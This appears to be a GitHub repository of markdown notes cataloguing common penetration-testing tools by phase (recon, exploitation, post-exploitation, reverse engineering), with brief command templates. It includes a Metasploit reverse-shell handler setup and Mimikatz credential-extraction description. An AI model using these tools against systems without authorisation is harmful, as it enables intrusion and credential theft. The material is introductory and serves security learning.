├── Reverse Engineering & Debugging.md ├── Exploitation.md ├── Post-Exploitation.md ├── Recon.md ├── Offensive Security Checklist.md └── README.md /Reverse Engineering & Debugging.md: -------------------------------------------------------------------------------- 1 | --- 2 | tags #debugging #reverseenginerring #RE #assembly #binary 3 | --- 4 | 5 | **GDB (GNU Debugger):** 6 | 7 | ``` 8 | command: gdb 9 | --- 10 | description: a powerful command-line debugger for various programming languages, commonly used for debugging and analyzing vulnerabilities in software. 11 | ``` 12 | 13 | **IDA Pro:** 14 | 15 | ``` 16 | command: ida64 17 | --- 18 | description: disassembler and debugger used for reverse engineering and analysing binary files, especially useful for understanding and exploiting vulnerabilities. 19 | ``` 20 | 21 | **WinDbg:** 22 | 23 | ``` 24 | command: windbg 25 | --- 26 | description: powerful debugger provided by Microsoft for Windows OS, used for analysing crash dumps, debugging drivers, and reverse engineering software. 27 | ``` 28 | 29 | **Wireshark:** 30 | 31 | ``` 32 | command: wireshark 33 | --- 34 | description: network protocol analyser, allows capturing of network traffic. Useful for identifying vulnerabilities and identifying network-based attacks. 35 | ``` 36 | -------------------------------------------------------------------------------- /Exploitation.md: -------------------------------------------------------------------------------- 1 | --- 2 | tags #exploits #malware #RCE #RevShell #CVE 3 | --- 4 | 5 | **Metasploit Framework:** 6 | 7 | ``` 8 | command: msfconsole 9 | --- 10 | description: exploitation framework that provides wide range of exploits, payloads and auxiliary modules. Very easy to browse and configure payloads. 11 | ``` 12 | 13 | **BurpSuite:** 14 | 15 | ``` 16 | command: burpsuite 17 | --- 18 | description: Set up web proxy, intercept desired traffic and analyse for vulnerabilities 19 | ``` 20 | 21 | **SQLMap:** 22 | 23 | ``` 24 | command: sqlmap -u --dbs 25 | --- 26 | description: tool used for automated detection and exploitation of SQL injection vuln in web apps. 27 | ``` 28 | 29 | **[ExploitDB](https://www.exploit-db.com)** 30 | 31 | ``` 32 | Online database of exploits and vulnerabilities, easy to use to find specific exploits and vulnerabilities for services, devices etc. 33 | ``` 34 | 35 | **[CVE Database](https://cve.mitre.org/)** 36 | 37 | ``` 38 | Similar to the previously mentioned ExploitDB, it is another online database that contains a vast collection of exploits and vulnerabilities for various software, platforms, and devices. 39 | ``` 40 | 41 | **OWASP ZAP** 42 | 43 | ``` 44 | command: zap.sh 45 | --- 46 | description: an open-source web application security scanner that helps find vulnerabilities in web applications during the development and testing phases. 47 | ``` 48 | -------------------------------------------------------------------------------- /Post-Exploitation.md: -------------------------------------------------------------------------------- 1 | --- 2 | tags #post-exploitation #persistence #privilege-escalation #lateral-movement 3 | --- 4 | 5 | 6 | 7 | **Mimikatz**: 8 | 9 | ``` 10 | command: mimikatz.exe 11 | --- 12 | description: post-exploitation tool that allows you to extract credentials, perform pass-the-hash attacks, and perform other post-exploitation activities related to Windows authentication and security. 13 | ``` 14 | 15 | **LinPeas:** 16 | 17 | ``` 18 | command: ./linpeas.sh 19 | --- 20 | description: a powerful post-exploitation script for Linux systems that performs automated enumeration and privilege escalation checks. It scans the target system for misconfigurations, vulnerabilities, and potential privilege escalation paths, providing valuable information for further exploitation and lateral movement. 21 | ``` 22 | 23 | **pspy:** 24 | 25 | ``` 26 | command: ./pspy 27 | --- 28 | description: a lightweight, unprivileged process snooping tool for Unix-like systems. It allows you to monitor and gather information about running processes, including active jobs, without requiring root privileges. This can be useful for identifying potential privilege escalation opportunities and understanding the system's behavior. 29 | ``` 30 | 31 | **MetaSploit Meterpreter:** 32 | 33 | ``` 34 | command: msfconsole -> use exploit/multi/handler -> set payload windows/meterpreter/reverse_tcp -> exploit 35 | --- 36 | description: a powerful post-exploitation payload provided by the Metasploit Framework. It allows for advanced post-exploitation activities such as file system manipulation, privilege escalation, and lateral movement within a compromised system. 37 | ``` 38 | -------------------------------------------------------------------------------- /Recon.md: -------------------------------------------------------------------------------- 1 | --- 2 | tags #Recon #networkexploration #cybersecurity #osint 3 | --- 4 | 5 | Recon is the first stage of a vulnerability analysis and [[exploitation]] routine in Offensive Security 6 | 7 | This stage involves both Active and Passive recon. 8 | 9 | ### Active Recon 10 | 11 | **NMAP**: 12 | 13 | ``` 14 | command: nmap -p 1-65535 -sV -sC 15 | --- 16 | description: network scanning tool. Discover open ports, identify services running on ports, gather information on the target system. 17 | ``` 18 | 19 | **Nessus:** 20 | 21 | ``` 22 | command: nessuscli scan --hosts --template "Basic Network Scan" 23 | --- 24 | description: vulnerability scanning tool. Provides detailed reports of results. 25 | ``` 26 | 27 | **Nikto:** 28 | 29 | ``` 30 | command: nikto -H 31 | --- 32 | description: automated vulnerability analysis tool for web apps, will crawl a domain and discover vulnerabilities and associated known exploits where possible. 33 | ``` 34 | 35 | 36 | **BurpSuite:** 37 | 38 | ``` 39 | command: burpsuite 40 | --- 41 | description: Set up web proxy, intercept desired traffic and analyse for vulnerabilities 42 | ``` 43 | 44 | ### Passive Recon 45 | 46 | **Maltego**: 47 | 48 | ``` 49 | command: maltego 50 | --- 51 | description: OSINT tool to gather and visualise information on a target. Reveal entity relationships of domain names, IP addresses, social media profiles etc. 52 | ``` 53 | 54 | **theHarvester:** 55 | 56 | ``` 57 | command: theharvester -d -b google 58 | --- 59 | description: tool used for gathering email addresses, subdomains, and related info to target domain. 60 | ``` 61 | 62 | **[Shodan](https://www.shodan.io)** 63 | ``` 64 | Search Engine for IP devices. Search specific devices, services, vulnerabilities etc. Use case: Find devices, identify open ports, gather information on device. 65 | ``` 66 | 67 | **Recon-ng:** 68 | 69 | ``` 70 | command: recon-ng 71 | --- 72 | description: CLI-based framework, for information gathering about domains, IP's, email addresses etc. 73 | ``` 74 | -------------------------------------------------------------------------------- /Offensive Security Checklist.md: -------------------------------------------------------------------------------- 1 | --- 2 | tags #cybersecurity #hacking #offensivesecurity #ofsec #exploits #vulnerabilities 3 | --- 4 | 5 |

Offensive Security Checklist is a comprehensive guide for individuals interested in cybersecurity and hacking. It covers various categories that are crucial for offensive security professionals.

Here is a summary of each category:

6 | 7 | > [!multi-column] 8 | > 9 | >> [!note]+ Recon 10 | >> This category focuses on the initial phase of an offensive security operation, which involves gathering information about the target. It includes techniques such as open-source intelligence (OSINT), network scanning, and vulnerability scanning. 11 | > 12 | >> [!warning]+ Exploitation 13 | >> In this category, you will find techniques and methodologies for exploiting vulnerabilities in target systems. It covers topics like exploit development, social engineering, and web application security testing. 14 | > 15 | >> [!summary]+ Post-Exploitation 16 | >> Once a system has been compromised, this category provides guidance on what to do next. It includes topics such as privilege escalation, lateral movement, maintaining access, and data exfiltration. 17 | > 18 | >> [!summary|center-align]+ Reverse Engineering & Debugging 19 | >> This category focuses on the analysis of software and systems to understand their inner workings. It covers topics like reverse engineering binaries, debugging techniques, and malware analysis. 20 | 21 |

By following this checklist, hopefully you will have a structured approach to offensive security, ensuring that you cover all the necessary aspects of a successful operation.


22 | 23 |

Checklist Categories:


24 | 25 | > [!multi-column|center-fixed] 26 | > 27 | >> [!blank|center] 28 | >> [![lightbulb icon|80](https://img.icons8.com/?size=512&id=184&format=png&color=FFFFFF&opacity=0)
Recon](Recon) 29 | >> 30 | >> [![macbook icon|80](https://img.icons8.com/ios/500/FFFFFF/blue--screen-of-death.png)
Exploitation](Exploitation) 31 | > 32 | >> [!blank|center] 33 | >> [![brain icon|80](https://img.icons8.com/ios/250/FFFFFF/command-line.png)
Post-Exploitation](Post-Exploitation) 34 | >> 35 | >> [![briefcase icon|80](https://img.icons8.com/ios/250/FFFFFF/window-bug.png)
Reverse Engineering & Debugging](Reverse%20Engineering%20&%20Debugging) 36 |
37 | 38 |

Check out the RSS feed for all the latest CVE updates at the minute!



39 | 40 | 41 | 42 | 43 | 44 | Data extracted from [CVEDetails](https://www.cvedetails.com) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Offensive Security Checklist 2 | 3 | ![Cybersecurity](https://img.shields.io/badge/Cybersecurity-Checklist-blue) 4 | ![Hacking](https://img.shields.io/badge/Hacking-Checklist-red) 5 | ![Offensive Security](https://img.shields.io/badge/Offensive%20Security-Checklist-orange) 6 | 7 | Welcome to the Offensive Security Checklist repository! This comprehensive guide is designed for individuals interested in cybersecurity and hacking. It covers various categories that are crucial for offensive security professionals. 8 | 9 | ## Summary 10 | 11 | The Offensive Security Checklist covers the following categories: 12 | 13 | ### Recon 14 | 15 | This category focuses on the initial phase of an offensive security operation, which involves gathering information about the target. It includes techniques such as open-source intelligence (OSINT), network scanning, and vulnerability scanning. 16 | 17 | ### Exploitation 18 | 19 | In this category, you will find techniques and methodologies for exploiting vulnerabilities in target systems. It covers topics like exploit development, social engineering, and web application security testing. 20 | 21 | ### Post-Exploitation 22 | 23 | Once a system has been compromised, this category provides guidance on what to do next. It includes topics such as privilege escalation, lateral movement, maintaining access, and data exfiltration. 24 | 25 | ### Reverse Engineering & Debugging 26 | 27 | This category focuses on the analysis of software and systems to understand their inner workings. It covers topics like reverse engineering binaries, debugging techniques, and malware analysis. 28 | 29 | By following this checklist, you will have a structured approach to offensive security, ensuring that you cover all the necessary aspects of a successful operation. 30 | 31 | In each of these categories, I provide widely utilised tools in Offensive Security practices and give key information and examples of how they can be used in a Pen Test environment. 32 | 33 | ## Checklist Categories 34 | 35 | - [Recon](Recon.md) 36 | - [Exploitation](Exploitation.md) 37 | - [Post-Exploitation](Post-Exploitation.md) 38 | - [Reverse Engineering & Debugging](Reverse%20Engineering%20&%20Debugging.md) 39 | 40 | 41 | 42 | ![0d553df4a58254742df71ddeb949f6b0](https://github.com/Stuub/Offensive-Security-Checklist/assets/60468836/8240c646-ee1f-43bc-b1d9-2a3ec94b9082) 43 | 44 | 45 | 46 | 47 | Feel free to explore each category and dive into the detailed information provided. 48 | 49 | Please do take heed that the populated data is still in its early stages and there are developments yet to be added as time goes on. Feel more than welcome to contact me any requests to be added! 50 | 51 | ## RSS Feed for CVE Updates 52 | 53 | Stay up to date with the latest CVE (Common Vulnerabilities and Exposures) updates by checking out our RSS feed. It provides real-time information on vulnerabilities and helps you stay informed about potential risks. 54 | 55 | Data extracted from [CVEDetails](https://www.cvedetails.com) 56 | 57 | The current RSS Feed shows new information daily! Could increase this further if people would prefer that :) 58 | 59 | 60 | 61 | 62 | Feel free to contribute to this repository and make it even more comprehensive. Happy hacking! 63 | 64 | --- 65 | --------------------------------------------------------------------------------